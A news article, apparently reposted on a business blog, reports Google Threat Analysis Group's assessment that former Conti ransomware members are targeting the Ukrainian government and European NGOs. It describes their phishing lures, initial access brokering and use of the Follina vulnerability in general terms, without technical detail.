6.7 C
London
Wednesday, September 28, 2022

Former Conti ransomware gang members helped attack Ukraine, Google says

Must read

PhonePe opens 50,000 sqm office in Pune

Leading fintech platform PhonePe announced on Tuesday the opening of its new office in Pune, which will accommodate nearly 400 employees and will be...

Teen dead after gunmen ambushed 5 high school soccer players in Philadelphia, police say

Five high school football players were shot in a deadly "ambush" after a scrimmage in Philadelphia on Tuesday, authorities said. A 14-year-old boy...

londonbusinessblog.com Session Calendar Announcement: Crypto 2022 • londonbusinessblog.com

The crypto industry has appeared to be aging for decades in the past bull run, maturing in places as it progressed into ambitious new...

Stockly raises another $12 million to sell out-of-stock items through other retailers • londonbusinessblog.com

French startup Stockly raises a $12 million (€12 million) Series A round from Eurazeo, Daphni and several business angels. The company bundles the...
Shreya Christinahttps://londonbusinessblog.com
Shreya has been with londonbusinessblog.com for 3 years, writing copy for client websites, blog posts, EDMs and other mediums to engage readers and encourage action. By collaborating with clients, our SEO manager and the wider londonbusinessblog.com team, Shreya seeks to understand an audience before creating memorable, persuasive copy.

A cybercriminal group that includes former members of the infamous Conti ransomware gang is targeting the Ukrainian government and European NGOs in the region, Google says.

The details come from a new blog post from the Threat Analysis Group (TAG), a team within Google dedicated to tracking state-sponsored cyber activity.

Now that the war in Ukraine has lasted more than half a year, cyber activity, including hacktivism and electronic warfare, has been constantly in the background. Now TAG says profit-hungry cybercriminals are becoming more active in the area.

From April to August 2022, TAG is tracking “an increasing number of financially motivated threat actors targeting Ukraine, whose activities are closely aligned with Russian government-backed attackers,” writes TAG’s Pierre-Marc Bureau. One of these state-backed actors has already been designated UAC-0098 by CERT, Ukraine’s National Computer Emergency Response Team. But a new analysis from TAG links it to Conti, a prolific global ransomware gang that took out the Costa Rican government in a cyberattack in May.

“Based on multiple indicators, TAG assesses that some members of UAC-0098 are former members of the Conti cybercrime group who are re-using their techniques to target Ukraine,” Bureau writes.

The group known as UAC-0098 has previously used a banking Trojan known as IcedID to launch ransomware attacks, but Google’s security researchers say it’s now shifting to campaigns that are “both politically and financially motivated”. According to TAG’s analysis, the members of this group use their expertise to act as initial access brokers – the hackers who first compromise a computer system and then sell the access to other actors interested in exploiting the target.

In recent campaigns, the group sent phishing emails to a number of organizations in the Ukrainian hospitality industry masquerading as Ukraine’s cyber police or, in another case, targeting humanitarian NGOs in Italy with phishing emails being sent. from the hacked email account of an Indian hotel chain.

Other phishing campaigns posed as representatives of Starlink, the satellite internet system of Elon Musk’s SpaceX. These emails provided links to malware installers disguised as software needed to connect to the Internet through Starlink’s systems.

The group linked to Conti also exploited the Follina vulnerability in Windows systems shortly after it was first published in late May this year. In these and other attacks, it is not known exactly what actions UAC-0098 took after systems were compromised, TAG says.

Overall, the Google researchers point to “blurring of the lines between financially motivated and government-backed groups in Eastern Europe,” an indicator of how cyber threat actors often tailor their activities to the geopolitical interests in a given region.

But it is not always a strategy that is guaranteed to win. At the start of the invasion of Ukraine, Conti paid the price for openly declaring support for Russia when an anonymous person leaked access to more than a year of the group’s internal chat logs.

More articles

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Latest article

PhonePe opens 50,000 sqm office in Pune

Leading fintech platform PhonePe announced on Tuesday the opening of its new office in Pune, which will accommodate nearly 400 employees and will be...

Teen dead after gunmen ambushed 5 high school soccer players in Philadelphia, police say

Five high school football players were shot in a deadly "ambush" after a scrimmage in Philadelphia on Tuesday, authorities said. A 14-year-old boy...

londonbusinessblog.com Session Calendar Announcement: Crypto 2022 • londonbusinessblog.com

The crypto industry has appeared to be aging for decades in the past bull run, maturing in places as it progressed into ambitious new...

Stockly raises another $12 million to sell out-of-stock items through other retailers • londonbusinessblog.com

French startup Stockly raises a $12 million (€12 million) Series A round from Eurazeo, Daphni and several business angels. The company bundles the...

Limit reached – Join the EU Startups CLUB

€147/quarter This option is ideal for companies and investors who want to keep up to date with Europe's most promising startups, have full access...